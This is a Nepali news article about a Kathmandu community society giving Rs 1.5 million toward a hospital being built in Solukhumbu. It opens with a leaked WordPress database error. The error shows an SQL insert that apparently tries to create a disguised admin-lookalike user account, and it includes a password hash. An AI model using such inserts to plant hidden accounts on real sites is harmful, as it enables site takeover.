WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BztyzMtnSjngRsOsFP/1gwQdEIjteo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 17:57:39', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । सोलुखुम्बुको थुलुङदूधकोशी गाउँपालिकामा निर्माणाधीन अवस्थामा रहेको दूधकोशी सामुदायिक अस्पताललाई सोही गाउँपालिकाको मुक्लीको मैदेल सेरोफेरो समाज काठमाडौंले १५ लाख रुपियाँ रकम हस्तान्तरण गरेको छ ।
जिल्लाको सबैभन्दा ठूलो गाउँपालिकाको केन्द्र मुक्लीमा गत वर्ष अस्पताल निमाणार्थ सञ्चालित महायज्ञमा समाजले गरेको प्रतिबद्धताअनुसार पहिलो किस्ता बापतको १५ लाख रुपियाँ रकम गाउँपालिका अध्यक्ष असिम राईलाई हस्तान्तरण गरिएको हो ।
पहिलो किस्ता बापतको रकम समाजका अध्यक्ष गणेशबहादुर गुरुङ र महासचिव गोविन्द गुरुङले संयुक्त रुपमा अध्यक्ष राईलाई हस्तान्तरण गरेको अध्यक्ष राई बताउनुभयो ।
थुलुङदूधकोशी गाउँपालिकाको केन्द्र मुक्लीमा सुविधा सम्पन्न ५० शैयाको अस्पताल निर्माणको काम तिव्र रुपमा अगाडी बढिरहेको अध्यक्ष राईको भनाइ छ । हजारौं दाताहरुले महायज्ञमा प्रतिवद्धता गरे अनुसारको अस्पताल निर्माणका लागि आर्थिक सहयोग क्रमशः प्राप्त भैरहेको बताइएको छ ।